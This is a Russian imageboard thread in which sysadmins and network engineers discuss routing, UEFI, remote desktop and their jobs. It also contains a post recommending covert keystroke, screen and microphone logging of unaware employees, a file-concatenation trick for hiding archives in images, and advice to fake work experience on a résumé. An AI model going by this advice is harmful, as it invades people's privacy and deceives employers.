По поводу сбора личной информации у нас в внутренний политике ИБ, которую подписывают все, на 50 страницах 12 шрифтом написано, что-то уровня, что "компания имеет право обрабатывать любые данные, которые вы обрабатываете средствами компании", "вы даёте своё полное согласие на обработку и передачу своих персональных данных", я не помню точный текст, но оно есть. Да, сотрудники про это не знают, как правила почты уровня гугла с двухфакторной авторизацией мы не смотрим, ну я не буду тебе рассказывать, что мы смотрим, а что нет, это не суть, да, по большей части не палимся

Ещё юзаем софт, который записывает каждый клик мышки и каждое нажатие пользователя на клавиатуре с скринами, плюс микрофон, можете купить 10-15 лицензий и ставить на ПК подозреваемых
Аноним 26/12/17 Втр 15:06:46 #312 №1156620 
>>1156598
Да, проверил, нашёл на лурке, пропускает, надо снимать его дамп попробовать, и посмотреть отличия от обычного жепега
Аноним 26/12/17 Втр 15:07:39 #313 №1156622 
rarjpeg.jpg
>>1156608
Раржпег - пикрелейтид. Там внутри текстовый конфиг от q3.

>в внутренний политике ИБ, которую подписывают все, на 50 страницах 12 шрифтом написано
Так в том и фишка, что если то, какой-то пункт договора противоречит законам/конституции РФ, то он будет признан не действительным! А во всех этих юридических тонкостях хуй разберешься. Многие компании пишут туда белиберду, чтобы людей больше припугнуть.

>>1156620
Ну вот я нашел дыру, лол.
Аноним 26/12/17 Втр 15:08:26 #314 №1156623 
>>1156622
ЛОЛ, двач попортил раржпег.
Аноним 26/12/17 Втр 15:11:41 #315 №1156626 
>>1156622
>Раржпег - пикрелейтид.
а зачем это надо?
Аноним 26/12/17 Втр 15:23:46 #316 №1156633 
>>1156626
Так раньше обменивались файлами на двачах.
Аноним 26/12/17 Втр 15:34:02 #317 №1156639 
>>1156623
Это ты коряво его склеил. Я с таки встречался. Нужно четко клеить именно формат с форматом, а не переименованные разрешения.
Аноним 26/12/17 Втр 15:56:00 #318 №1156679 
>>1156639
Делал так:
cat img.jpg 1.rar > rarjpeg.jpg
И у меня локально он отлично работает - открывается и картинка и архив.
Аноним 26/12/17 Втр 16:28:37 #319 №1156733 
Надо было на убунту 16 настроить xrdp пиздец 2 дня как об стену. Не работает русская раскладка и все. Я в ахуе просто, интернеты завалены похожей проблемой аж с 2009 года но никто нихуя ничего не поправил.

Так просто крик души.
Аноним 26/12/17 Втр 16:31:09 #320 №1156735 
>>1156733
>xrdp
Не хочу тебя расстраивать, но и у всех vnc-серверов под линем тоже есть проблемы с работой русской раскладки.
Аноним 26/12/17 Втр 16:31:51 #321 №1156737 
Пацаны, вечер в хату. Будьте так добры, выручите советом. Необходимо получить знания по ЛВС. Имеется книга семейки Оливеров (Компьютерные сети). Так вот, годное чтиво или нет? Может лучше что то новее начать изучать?
Я сам электрик, и по работе свалилось на меня сетевое оборудование. Имеется оборудование которое работает по PRP протоколу.
Так вот, накидайте плиз чего можно почитать, что бы въехать ЛВС, желательно с азов, дабы ничего не пропустить.
Аноним 26/12/17 Втр 16:35:01 #322 №1156740 
>>1156735
Блядь. Нужно было марьвановне дать доступ. Пиздец значит. У меня нервов уже не хватит. Причем сука у кого то же работает.
Аноним 26/12/17 Втр 16:35:21 #323 №1156743 
>>1156737
>Имеется оборудование которое работает по PRP протоколу.
Это ещё что за херня?
По теме — курс ICND 1 и ICND 2
Аноним 26/12/17 Втр 16:36:07 #324 №1156745 
>>1156737
>PRP
Ты ничего не путаешь? Я даже с гуглом не смог до конца понять о чем ты.

>Оливеров
Спорное произведение. Во многом устаревшее, с другой стороны оно о фундаментальных основах, который в общем и не поменялися нихуя.
Аноним 26/12/17 Втр 16:37:55 #325 №1156747 
>>1156743
>Это ещё что за херня?
>Ты ничего не путаешь? Я даже с гуглом не смог до конца понять о чем ты.
Лол я тоже не понял про что он, гуглю, тоже не понял. Ну лан думаю я долбоеб наверное. А оказывается нет. Может опечатался.
Аноним 26/12/17 Втр 16:39:31 #326 №1156751 
>>1156747
>Лол я тоже не понял про что он, гуглю, тоже не понял. Ну лан думаю я долбоеб наверное. А оказывается нет. Может опечатался.
Я-то сетевиком работаю, но не слышал про
>PRP
Аноним 26/12/17 Втр 16:43:05 #327 №1156755 
>>1156751
Я как бы тоже.
Аноним 26/12/17 Втр 16:44:44 #328 №1156760 
Figure09.jpg
>>1156743
>По теме — курс ICND 1 и ICND 2
Это я так понимаю за деньги?
Мне бы пока что бесплатно начать въезжать.
>>1156745
>Ты ничего не путаешь? Я даже с гуглом не смог до конца понять о чем ты.
Parallel Redundancy Protocol.
>Спорное произведение.
Так стоит ли читать? Может чего поновее изучить? Не хочется время зря терять. Может в ЛВС есть какой-нибудь must have?
Аноним 26/12/17 Втр 16:44:46 #329 №1156761 
>>1156751
>>1156755
ВОН ИЗ ПРОФЕССИИ!!!11
Аноним 26/12/17 Втр 16:46:22 #330 №1156763 
>>1156760
>Это я так понимаю за деньги?
>Мне бы пока что бесплатно начать въезжать.
Не, можно скачать на торрентах. Есть вроде бы на русском. Т.к ты не сетевик и тебе скорее всего не нужно углубляться в работу всяких протоколов маршрутизации, достаточно будет этого. Или книгу по подтоговке к CCNA можешь погуглить.
А можешь посмотреть на ютубчике СДСМ, первые 6-7 видео
Аноним 26/12/17 Втр 16:51:10 #331 №1156770 
>>1156761
Окай.
Аноним 26/12/17 Втр 16:51:56 #332 №1156773 
>>1156763
>СДСМ
Благодарю, походу это то что надо.
Аноним 26/12/17 Втр 17:22:42 #333 №1156822 
Посоны, как nmap узнаёт аптайм у сервера? Сканирую свою vps, а там указано прям сколько дней она подряд работала.
Аноним 26/12/17 Втр 18:56:54 #334 №1156951 
Что то аноны, устроился на большой бабос, за 42 часа, поспал 4. Мне то похуй, я то не женатый, а как другие тут работают, я хуй знает.
Аноним 26/12/17 Втр 19:15:28 #335 №1156962 
>>1156233
Ммм. Chubby? BBW? Или сразу PLUMP?
Аноним 26/12/17 Втр 19:17:59 #336 №1156964 
>>1156737
ХАРДОВЫЙ ЭЛЕКТРИК РЕШИЛ ВКАТИТЬСЯ В ЛВС
@
ПЕРВОЕ ПРАКТИЧЕСКОЕ ЗАДАНИЕ - РАЗВОДКА КОННЕКТОРОВ
@
ПО ПРИВЫЧКЕ ПРИКРУЧИВАЕТ ФАЗУ С НУЛЁМ
Аноним 26/12/17 Втр 19:21:00 #337 №1156967 
>>1156737
https://en.wikipedia.org/wiki/Parallel_Redundancy_Protocol
Вкинь, пожалуйста, модели того оборудования, которое на тебя свалилось.
Аноним 26/12/17 Втр 19:21:57 #338 №1156968 
>>1156737
https://www.cisco.com/c/en/us/td/docs/switches/lan/industrial/software/configuration/guide/b_prp_ie4k_5k.html
Если осилишь на английском, и если оборудование от Cisco.
Аноним 26/12/17 Втр 19:57:03 #339 №1156987 
Ухватил за 12 баксов на год vps неплохую, два выделенных ядра проца, столько же гигабайт оперативы, 1 терабайт трафика на месяц, 50гб жёсткого диска. Но вот беда, виртуалка средствами openvz, и ещё ядро сверхдревнее.

С учётом вышесказанного, как мне добиться изоляции внутри этого сервера? Обычно я пердолю либо lxc либо докер, но внутри openvz это как я понимаю не вариант, да? Что ещё для изоляции можно использовать?
Аноним 26/12/17 Втр 20:04:56 #340 №1156991 
>>1156967
Чего именно? Там куча контроллеров нижнего уровня, сервера среднего уровня, сервера скады, свичи руджеткомы и т.д. И все это объвязанно по PRP.
>>1156968
Cisco нет.
Аноним 26/12/17 Втр 20:40:18 #341 №1157010 
>>1155870
>Что до iBGP, то без IGP он как бы всё равно не заработает
Эт почему еще?

мимо-стремящийся
Аноним 27/12/17 Срд 01:40:01 #342 №1157034 
Аноны, есть в ДС2 сменная работа для саппорта?
Аноним 27/12/17 Срд 09:09:29 #343 №1157064 
>>1156633
>>1156626
Абу пофиксил после того как так стали обмениваться центральными процессорами
Вообще так до сих пор обмениваются центральными процессорами, только не на аиб
Аноним 27/12/17 Срд 09:21:51 #344 №1157069 
>>1157010
BGP - протокол для чего? Для обмена маршрутной информацией между автономными системами. Это его основное предназначение. Внутри AS нет никаких других AS (конфедерации мы сейчас не рассматриваем), поэтому iBGP внутри AS используется только для передачи маршрутной информации полученной из внешних AS, т.е. предназначение iBGP - помогать работать eBGP, они всегда работают в связке и iBGP отдельно применяться просто не может. Соответственно, внутри AS мы всё равно используем какой-то из протоколов IGP, чтобы наша сеть была сетью, а не набором узлов и проводов.

Если вдаваться в технические детали, то для BGP, как и для любого другого протокола маршрутизации критически важна доступность next-hop. Если он недоступен, то маршруты ни в RIB, ни в CEF никогда не попадут. Что такое next-hop для eBGP? Это сосед от которого были получены маршруты, т.е. мы проверяем фактически достижимость соседней AS. Для eBGP всё понятно: если некст хоп недоступен, маршруты от него пропадут после падения сессии. А кто будет для маршрутизатора iBGP next-hop? Классический вариант: next-hop будет всё тот же внешний сосед(!) и специальный случай: можно перенастроить пограничный eBGP/iBGP маршрутизатор, чтобы он указывал в качестве next-hop самого себя.

Так вот в классическом случае, чтобы маршруты полученные по BGP попали в RIB/CEF важно, чтобы next-hop УЖЕ был доступен на всех iBGP маршрутизаторах, а как это может быть, если информация о нем приходит по самому iBGP? Никак. Значит, мы должны ее получить по IGP протоколу! Т.е. на нашем граничном BGP маршрутизаторе н>>1157010
ужно сделать редистрибьюцию BGP next-hop адреса (и только его!) в IGP протокол, где указать, что этот самый next-hop внутри нашей сети доступен через наш же пограничный BGP маршрутизатор.

>>1157064
Лучше б он капчу пофиксил, мудень, блядь, а от стеганографии всё равно нет способа защититься.
Аноним 27/12/17 Срд 09:37:28 #345 №1157073 
>>1157069
Я вот тоже что-то не понял, отчего BGP не может работать без IGP. У нас работает, например.
Аноним 27/12/17 Срд 09:39:16 #346 №1157076 
>>1157069
>из протоколов IGP, чтобы наша сеть была сетью, а не набором узлов и проводов.
IGP внутри сети не используем, потому как топология звезда, где ЦОД в центре. Статика используется в основном.
Аноним 27/12/17 Срд 09:45:36 #347 №1157082 
>>1157073
Ну я тогда даже ХЗ, как еще понятнее объяснить... BGP и IGP просто имеют разные назначения.

>>1157076
Статика - сорт оф IGP.
Аноним 27/12/17 Срд 15:03:57 #348 №1157144 
Какой-то блять пиздец это ебучее IT, работаю сисадмином(по сути devops+хуй с картриджами(у нас нет офисного админа в конторе занимающейся бусиносом в IT сфере(не буду до конца палиться) меняем даже двери в офисе (это очень палит)) - утром выкладываешь сервисы, ебешься с докерами хуекерами, пишешь ебаный код, конфиги которые рендерят другие ебучие конфиги, лепишь мониторинг, алертинг, ищешь ошибки в коде разработчиков, потому что ты блять эксплуатация и видишь это первым, ночью будят потому что твой ебаный алертинг работает, а код нихуя, приходишь утром - бухгалтерия доебывается со своим 1С, потому что у них там какие-то ебаные блокировки с файловым 1С за который тебе не платят, и вообще есть аутсорсер(причем ебут очень настойчево), и все ездят по ушам, и думаешь такой - нахуй блять вообще ввязался в эту ебучую работу, а когда, блять, наебнется какой нибудь ceph - админы будут крайними и хуями будут крыть опять их, в пизду пацаны лучше ни за хуя не отвечать, продавать смартфоны в связном и жить с мамкой, отвечаю.
Аноним 27/12/17 Срд 15:16:04 #349 №1157145 
Почему UEFI такое кривое говно? Вот с любой же стороны. Почему оно стало таким популярным и зачем убили BIOS?
Аноним 27/12/17 Срд 15:16:18 #350 №1157147 
>>1157144
Если ты такой скилловый чувак, нахуя сидишь на этой говноработе?
Аноним 27/12/17 Срд 15:19:40 #351 №1157148 
>>1157145
Сам ты кривое говно, а EFI вместе с GPT крутейшие штуки!
Аноним 27/12/17 Срд 15:41:22 #352 №1157151 
>>1157147
потому что на шеяке девушка, квартира и 4 кота, нужно ебашить и не отвлекаться, при перебежке на др место работы можно неприятно влететь, в общем я трусливая блядь, но выход действительно один.
Аноним 27/12/17 Срд 15:41:52 #353 №1157152 
>>1157151
и не факт что там будет лучше :<
Аноним 27/12/17 Срд 15:44:29 #354 №1157153 
>>1157151
сколько платят тебе ?
Аноним 27/12/17 Срд 15:48:11 #355 №1157154 
>>1157148
Только и читаю "круто, модно, молодёжно!". А аргументов не вижу. Только проскальзывает иногда "Да тут ТАКОЕ можно забабахать! Ух!" Но мне вот не нужно "такое". Мне нужно, чтобы был единый стандарт и всё работало как часы без танцев с бубном. Без всех этих "ой, уефи не понимает нтфс, но у меня образ больше 4Гб, щито же делать?! А, знаю, я создам посредника на одном разделе с фат, а сам образ запишу на нтфс, отключу Secure boot, для этого воспользуюсь тремя утилитами, командной строкой и скриптами на павершелле! Вау, какой я крутой! Такого франкенштейна собрал! УЕФИ КРУТО! УЕФИ ФОРЕВА! УРА! УРА! УРА!". С биосом-то всё проще: взял образ, установил его на флешку. Всё. Не успеваешь почувствовать себя крутым хацкером.

Блядь, маму абу ебал с этими бесконечными вывесками, знаками и прочим дерьмом.
Аноним 27/12/17 Срд 16:07:01 #356 №1157158 
---
Компания Cisco предложила принципиально новое решение в этой гонке — самообучающуюся Интуитивную сеть. Чем дольше вы ее используете, тем умнее она становится, непрерывно адаптируясь к потребностям вашего бизнеса и защищаясь от угроз. Благодаря разработкам Cisco вы сможете сократить расходы и время на обслуживание, сосредоточившись на внедрении инноваций.
---
Сетевики!
Я давно говорил, что вы не нужны!
Наконец-то циска выпустила стоящий продукт, который позволит избавится от вас, как от балласта фирмы.
Сеть сама себя настроит, без вашего участия. Только коробки по этажам ставь да включай в розетку"!
Аноним 27/12/17 Срд 16:11:36 #357 №1157161 
>>1157152
>и не факт что там будет лучше :<
Везде лучше, где нет быдлоофиса. Алсо, ипотека - зло. Вангую, что работодатель о ней знает и поэтому так на тебе ездит.
Аноним 27/12/17 Срд 16:14:07 #358 №1157163 
>>1157158
"Куплю обученную сеть"
Аноним 27/12/17 Срд 16:17:16 #359 №1157164 
>>1157154
О чем ты вообще? Для GPT диска и UEFI загрузчика тебе нужно сделать один раздел с загрузчиком в fat-е, помеченный как EFI и один диск с системой. Нужно поставить на один хард несколько систем? Пожалуйста! Делай свой раздел с загрузчиком для каждой из них и всё! При том в GPT можно эти загрузочные разделы располагать где угодно и как угодно. Нужна безопасность? Включай секьюр бут, прописывай ключи в UEFI и в загрузчик. Более того, любой загрузчик имеет доступ к инфе о других загрузчиках и разделах, т.е. ты можешь из одного загрузчика как перейти в любой другой загрузчик, так и напрямую загрузить систему с любого размера. Ну то есть можно иметь и всего один EFI загрузочный раздел, главное, чтобы загрузчик в нем был достаточно "умным", как, например, GRUB.

Да, тот факт, что поставщики компов уже включают секьюр бут и прописывают только ключ от предустановленной винды немного путает, но в целом то они всё как раз правильно делают, просто это не всегда то, чего хочет "продвинутый" пользователь.
Аноним 27/12/17 Срд 16:18:21 #360 №1157166 
>>1157164
>с любого раздела
fix
Аноним 27/12/17 Срд 16:28:38 #361 №1157169 
>>1157164
У меня сейчас новый сервер PowerEdge T330, на который нужно поставить Hyper-V (на Windows 2016). Мать сейчас в режиме UEFI. Образ 2016 весит почти 6Гб. Я уже и так и сяк и через косяк, но сервер упорно не видит флешку. Либо я где-то затупил в настройках, либо как-то неправильно режу флешку. Зараза, давно уже этим не занимался, раньше как-то проще всё было.
Аноним 27/12/17 Срд 16:31:12 #362 №1157170 
>>1157169
iDRAC надо потому что использовать и делать установку из образа по сети. С флешки там можно загрузится, но, блядь, я не помню уже как - последний раз dell настраивал года 4 назад и оно и тогда было весьма не тривиально.
Аноним 27/12/17 Срд 18:04:55 #363 №1157186 
>>1157170
Через iDRAC он iso почему-то не видит. Пизда, пизда, огорчение.
Аноним 27/12/17 Срд 19:56:44 #364 №1157215 
В каком разделе пердолики сидят у нас?
Аноним 27/12/17 Срд 20:03:15 #365 №1157218 
>>1156735
Таки поставилось. Оказалось баг какой то в xrdp0.6 , воткнул 0.9 и норм. Но все равно как то не стабильно работает. Юзеру такое не дашь.

анон >>1156733
Аноним 27/12/17 Срд 21:44:40 #366 №1157254 
>>1156987
Бамп вопросу.
Аноним 28/12/17 Чтв 00:09:52 #367 №1157283 
Анон не было новостей про CCNP ? Циска там не собирается обновлять трек в следующем году?
Аноним 28/12/17 Чтв 08:19:41 #368 №1157316 
>>1157283
>Анон не было новостей про CCNP ? Циска там не собирается обновлять трек в следующем году?
да черт его знает.
Сдавать собрался? Накой?
Аноним 28/12/17 Чтв 08:29:46 #369 №1157319 
>>1157186
А ты iso, случаем, не с локального диска монтируешь? По идее, iso-шник должен лежать в шаре.
Аноним 28/12/17 Чтв 10:37:45 #370 №1157330 
>>1157316
Ну CCNA кончается. Ну если по треку пойдешь то повторишь все, да и дрочат еще на бумагу эту. Думаю CCNP Норм так будет.
Аноним 28/12/17 Чтв 10:44:38 #371 №1157331 
>>1157319
Не, с сетевого.
Я вчера таки дошаманил. Вечером уже поставил резать новую флешку, с утра попробоваk - загружается. Самое смешное, что рабочая флешка получилась самым простым способом: поставить в WinSetupFromUSB 1.8 галку "auto format" (align, copy BPB , FAT32) и указать образ.
Аноним 28/12/17 Чтв 11:28:23 #372 №1157337 
>>1157331
Хотя нет, что-то тут не то. Эта флешка работает. Зарезал тем же способом другую - не работает. Вот же шайтан-машина.
Аноним 28/12/17 Чтв 13:55:16 #373 №1157395 
>>1157330
>Ну если по треку пойдешь то повторишь все
ну разве что ради этого.
На бумажку никто не дрочит. Даже выделять в резюме считаю дурным тоном.
Аноним 28/12/17 Чтв 15:07:25 #374 №1157419 
>>1157330
зачем тебе эти сети? Сетевикам жить осталось 5-7 лет, дальше они вымрут за ненадобность. Это ж явно атавизм — держать сетевиков в компании.
Надо изучать либо менеджмент/бизнес-аналитику, либо в разработку ударяться. Админство это не ИТ.
Аноним 28/12/17 Чтв 15:10:47 #375 №1157420 
>>1157419
Ага, я прямо так себе и представляю, как заявки о падении каналов будут сами заводиться, а BGP сам настраиваться при том во всем интернете разом...
Аноним 28/12/17 Чтв 15:12:53 #376 №1157421 
>>1157420
>Ага, я прямо так себе и представляю, как заявки о падении каналов будут сами заводиться
пфф....система мониторинга на что? Канал упал - системаотправляет письмо в поддержку - если канал поднялся, то отправляет письмо о том, что все работает. Проверка по пингу. В чем проблема?
BGP надо настроить один раз и более не трогать. Для этого будет 1 инженер на 100 энтерпрайзов
Аноним 28/12/17 Чтв 15:19:29 #377 №1157422 
>>1157421
Ты просто дилетант, поэтому такую ерунду и пишешь. В реальности падения канала не всегда можно отследить мониторингом, т.к. "падение" - это слишком общее понятие. У нас, например, провайдерский линк через L2 устройство заведен, а потом через вланы на роутер проброшен, где уже висит адрес внешний. Так вот стала прилетать бпдушка на L2 оборудовании кривая - связи нет, а линки все есть. Пока стп не отключишь, канал не работает. В чем проблема - ХЗ, мы у себя ничего не меняли, раньше всё работало. Провайдер считает, что у них всё замечательно. Два дня разбираемся и бодаемся.

Или проще случай, чтобы ты точно понял о чем я. Упала площадка - связи нет. Заводить заявку? ХУЙ! У них просто электричество отключили на полчаса...

Да, конечно, надо и L2 уровень всесторонне мониторить и с ИБП данные о пропадании электричества тоже отслеживать. Но по факту ИБП то не везде даже есть, а мониторить всё на свете - это нужно штаб отдельных людей держать, чтобы они систему в актуальном состоянии постоянно поддерживали. Как ни крути - люди нужны. Да, не 10 сетевиков, а 1-2 человека, но так их уже давно в большем количестве никто и не держит...
Аноним 28/12/17 Чтв 15:24:37 #378 №1157425 
>>1157422
>вязи нет, а линки все ест>>1157422
>бпдушка на L2 оборудовании кривая - связи нет, а линки все есть
а хули вы bpdu-шки провайдеровские принимаете! bdpufilter enable надо было ставить!
Это раз!
А два вот :
В любой филиал заводится два канала - резервный и активный. Мониотринг смотрит - если оба лежат, значит письмо не надо отправлять, скорее всего электричество вырубили. А если один из каналов лежит, то отправляй письмо оператору.
Аноним 28/12/17 Чтв 15:26:15 #379 №1157426 
>>1157425

вот и всё!
И нахрен держать сетевика!
Скоро выпустят Cisco DNA и повсеместно начнут использовать — железки сами себя настроят как надо!
Аноним 28/12/17 Чтв 15:27:53 #380 №1157427 
>>1157421
>BGP надо настроить один раз
А если ты провайдер?!

>>1157425
>если оба лежат, значит письмо не надо отправлять
И как ты это хочешь автоматически разруливать? Например, один канал упал сразу, а другой через пару часов, потом что один ИБП на площадке таки был...

>>1157426
Не настроят. Хотя бы потому что кто-то должен будет сказать им КАК им себя настраивать. Ну там тот же lldp включить на цисках на доступе, чтобы ip-телефония от avaya заработала...
Аноним 28/12/17 Чтв 15:31:51 #381 №1157428 
>>1157427
>Не настроят. Хотя бы потому что кто-то должен будет сказать им КАК им себя настраивать. Ну там тот же lldp включить на цисках на доступе, чтобы ip-телефония от avaya заработала...
Интегратор один раз сделает и забудет.
>И как ты это хочешь автоматически разруливать? Например, один канал упал сразу, а другой через пару часов, потом что один ИБП на площадке таки был...
А почему вы так реализовали отказоусйчивость, что у вас ИБП обечпечивает только один канал?!
Аноним 28/12/17 Чтв 15:37:40 #382 №1157430 
>>1157428
>Интегратор
ЛОЛ, а с чего ты взял, что в примере выше про бпдушку это настроил не он, а местные админы? Интегратору намного больше плевать на ошибки в конфигурировании, чем локальным сетевикам.

>вы так реализовали отказоусйчивость
Мы просто в год покупаем с десяткой другой мелких бизнесов и они становятся нашими филиалами. Покупаем как есть, а приведение к единым стандартам - это процесс на месяцы и годы.

Твои высказывания и вопросы показывают, что ты либо глупый траль, либо абсолютно не знаком с реалиями ведения бизнеса в России. И честно сказать, я даже не знаю что хуже...
Аноним 28/12/17 Чтв 15:59:30 #383 №1157431 
>>1157425
Это не наша и не провайдерская бпдушка как сейчас выяснилось. Просто провайдер арендует последнюю милю у какого-то местечкового мелко-провайдера, вот его то оборудование и начало себя вести неадекватно.
Аноним 28/12/17 Чтв 16:19:26 #384 №1157432 
photo2017-12-2812-37-53.jpg
Говорила мне мама "не еби вола, получай сертификаты!"
Аноним 28/12/17 Чтв 16:21:29 #385 №1157433 
>>1157430
> Интегратору намного больше плевать на ошибки в конфигурировании, чем локальным сетевикам.
Трустори
Аноним 28/12/17 Чтв 16:22:57 #386 №1157434 
>>1157433
Нам вообще на все поебать, если совсем честно.
мимо из интегратора
Аноним 28/12/17 Чтв 16:39:24 #387 №1157435 
тест капчи
Аноним 28/12/17 Чтв 16:41:14 #388 №1157436 
>>1157430
>Твои высказывания и вопросы показывают, что ты либо глупый траль, либо абсолютно не знаком с реалиями ведения бизнеса в России. И честно сказать, я даже не знаю что хуже...
Хорошо, сетевики! Вот что вы делаете в моменты, когда не открывается новых офисов, не ставится новое оборудование? Пердолите iptables? vlan на портах прописываете?! Тьфу, блять!
Аноним 28/12/17 Чтв 16:45:06 #389 №1157437 
>>1157395
Дрочат дрочат. А в интеграторах так вообще обязательно ее иметь. HR пройти поможет еще, а там уже тащишь знаниями. Еще экзамен эта такая интересная штука, как будто на собеседование сходил, спрашивают всякие вещи которые ты не ожидал. Считаю это дело чрезвычайно полезным.
>>1157419
Ну я python учу еще. Будем еба SDN рулить же.
Аноним 28/12/17 Чтв 16:46:44 #390 №1157438 
>>1157436
>что вы делаете в моменты, когда не открывается новых офисов, не ставится новое оборудование?
В интеграторах/провайдерах таких моментов вообще нет - там постоянная и непрерывная движуха. В хорошем энтерпрайзе - занимаешься развитием мониторинга, ходишь на обучение, приводишь всё ранее купленное к единому знаменателю. Если совсем становится тухло, то меняешь работу - вакансий на рыке просто овер дохуя.

Олсо сам планирую сходить на два фастлайновских курса: NPDESI и NPDEV - первый это программирование для сетевиков, второй - это сети для программистов. Там как раз обучают тому что ты нам всем тут пророчишь. Но есть у меня опасения, что эти курсы окажутся слишком таки поверхностными для меня, а узнать не у кого, т.к. по словам препода - они в рашке не популярные очень, хотя в Европе на них народ валит валом...
Аноним 28/12/17 Чтв 16:47:31 #391 №1157439 
>>1157434
Двачую. Интеграторы такие ошибки бывает допускают что просто пиздец. И им за это нихуя не бывает, потому как бабки пилятся на самом верху между своих, а простых ишаков никто не трогает.
Аноним 28/12/17 Чтв 18:28:26 #392 №1157453 
Screenshot2017-12-28-20-20-43-113ru.superjob.client.android.png
Анон, что делать если я накидался базовой инфой, опыта работы нет, а вместо вакансий пикрилейтед? Везде нужен стаж.
Аноним 28/12/17 Чтв 19:43:31 #393 №1157463 
>>1157453
>Анон, что делать если я накидался базовой инфой, опыта работы нет, а вместо вакансий пикрилейтед? Везде нужен стаж.
пиздеть на собеседовании. Нарисовать левый опыт в резюме
Аноним 28/12/17 Чтв 19:45:46 #394 №1157464 
>>1157463
Двачую этого. По другому не влезть, либо очень очень редкая вакансия будет без опыта за еду.
Аноним 28/12/17 Чтв 21:41:41 #395 №1157480 
>>1156987
Снова бамп вопросу.
Аноним 29/12/17 Птн 11:26:03 #396 №1157581 
>>1157463
Так это ж можно обосраться, если возьмут, а ты чего-то элементарного не умеешь. Мало ли, упустил.
Аноним 29/12/17 Птн 11:28:21 #397 №1157582 
>>1157581
>Так это ж можно обосраться, если возьмут, а ты чего-то элементарного не умеешь. Мало ли, упустил.
Не парься на этот счет. На той работе, на которую ты претендуешь, всё что угодно можно нагуглить или спросить на форуме.
Аноним 29/12/17 Птн 12:27:40 #398 №1157589 
5nine-error.png
Не могу создать виртуальный свитч на Hyper-V 2016. Это у меня руки кривые и где-то что-то забыл настроить, или просто рандомный глюк?
Аноним 30/12/17 Суб 02:56:25 #399 №1157822 
photo1317570523759224862.webm
Аноним 30/12/17 Суб 06:03:39 #400 №1157827 
>>1157589
Ну так ты в логах смотрел?
Аноним 31/12/17 Вск 14:03:51 #401 №1158208 
Год назад впервые пришла идея походить на собеседования и попробовать устроиться в московские системные интеграсты.
Охуел от зарплат - это реально пиздец, за 90-110к рвать жопу с постоянными переработками.
Причём в одном месте мне прямо сказали: больше тебе никто не даст, сейчас в ойти везде такие зарплаты. Наглый пиздёж, если слышите такое - сразу разворачивайтесь и уходите.
Сама техническая часть собеседования тривиальна. Вопросы могут быть и очень простые, и сравнительно сложные. На одном из собеседований у меня одновременно спрашивали и сайзинг Lync Server на 100к юзеров, и для чего нужна маска подсети. Энивей, если вы средне знаете материал, то вы ответите на всё.
Реалии работы везде немного разные, но в целом системный интегратор это ональное рабство. Вы работаете с людьми, у которых зачастую уже развилась деперсонализация от постоянных стрессов. Погонщик орёт что надо вчера. Заказчик брызгает слюной и орёт на переговорах что вы все пидарасы ёбаные и вам пиздец. Текучка кадров, как правило, очень серьёзная.
Да, вот ещё, требовать от вас будут реально много. Подвачевать капчу не удастся. Вы будете не успевать ничего. Платить вам за это будут вышеупомянутую сумму. Плюс оплата за переработки. То есть вы обходитесь конторе крайне дёшево.
Поработал в итоге полгода в одном из интеграторов. Когда почувствовал отвращение к админству, то уволился и нашёл другую работу. Теперь всё нормально, интерес к профессии снова появился.
Что-то ещё хотел написать, забыл.
Аноним 31/12/17 Вск 14:47:12 #402 №1158238 
всех с наступающим

я вообще 1го работаю

правда выбил работу из дома. че поделать, сменный график, сэр
Аноним 31/12/17 Вск 17:25:13 #403 №1158278 
>>1158208
> Да, вот ещё, требовать от вас будут реально много. Подвачевать капчу не удастся. Вы будете не успевать ничего.
На самом деле это сильное заблуждение.
Поработал в нескольких крупных компаниях (в интеграторах в том числе), практически никто в полную силу не работает. Абсолютное большинство айтишников работает либо медленно (не хватает ума или не могут оптимизировать свой рабочий процесс), либо сознательно тратят время на хуйню (чай-кофе, синьюс-рбк-хабрахабр). Эти люди как раз будут рассказывать как много работы и они ничего не успевают.

Я сам довольно ленивый, всё откладываю на последний момент, при этом всегда отвечаю за обозначенные мною сроки и делаю задачи вовремя. Меня считают лучшим инженером в отделе и периодически повышают должность и зарплату. Даже интересно, что было бы, если бы я выкладывался сильнее.

Среди интеграторов, жёстко эксплуатирующих работников, всегда отмечают Крок. Не знаю насколько это правда, но мнение очень популярное. Могу порекомендовать только обходить стороной эту компанию. В других виденных мною компаниях всё как я написал в первом абзаце (несмотря на ужасные отзывы).
Аноним 01/01/18 Пнд 14:21:40 #404 №1158476 
>>1158278
>Абсолютное большинство айтишников работает либо медленно
Ну уж в интеграторах точно не имеет смысла работать быстрее определённой, эээ, скорости работы. Потому что её там всегда дохуя, сделал одно - нагрузили другим.
Аноним 01/01/18 Пнд 14:42:18 #405 №1158488 
>>1158476
И что в этом плохого? Будут нагружать разными задачами, более важными и ответственными. Это опыт, и соответственно повышение или больше возможностей при смене работы.
Если человек активен, ответственен и не полный мудак в общении, его никто не будет годами держать на одной и той же позиции с одинаковыми задачами.
Аноним 01/01/18 Пнд 15:12:43 #406 №1158496 
>>1158488
Ога ога, всё так обычно и происходит. Сделал одну задачку, добрый руководитель говорит: молодец, а вот теперь держи задачу посложнее. Растёшь, умнеешь. Сделаешь ещё пару задач посложнее, тогда повысим тебя и зарплату побольше дадим.
Аноним 01/01/18 Пнд 17:36:59 #407 №1158529 
>>1158496
Никто не говорит, что это быстро происходит. У меня такое обычно на второй год работы, когда я успеваю показать себя.
А если у вас тухляк (или плохой руководитель), меняйте место.
Аноним 01/01/18 Пнд 18:01:19 #408 №1158531 
>>1158208
>и нашёл другую работу.
рассказал бы на что сменил.
Аноним 01/01/18 Пнд 20:33:32 #409 №1158540 
>>1158208
Поясните, кстати, за интеграстов. Они, получается, сорт оф админско-эникейный аутсорс? Ну то есть, как и обычный отдел IT-инфраструктуры, но только обслуживающий сразу несколько компаний, преимущественно по удалёнке. Есть ли у них какая-нибудь техническая документация по сетям обслуживаемых ими компаний?
Вот, к примеру, я устроюсь на должность на должность сетевика в интеграторе. Первый день. Поступает мне звонок из компании "Залуп-Продакшн", жалуются на то, что не могут связаться с их удалённой площадкой в другом городе. Я, как уже сказал, вообще первый день на работе и не ебу что там и как у этого клиента в сети устроена. Может у них там распределённая сеть на тёмном волокне и, внезапно, пошла по пизде динамическая маршрутизация, или, ну, к примеру, ещё какая-то хуйня произошла. Куда мне глядеть, чтобы хотя бы понять, откуда начать расспрашивать клиента?
Аноним 01/01/18 Пнд 20:36:45 #410 №1158541 
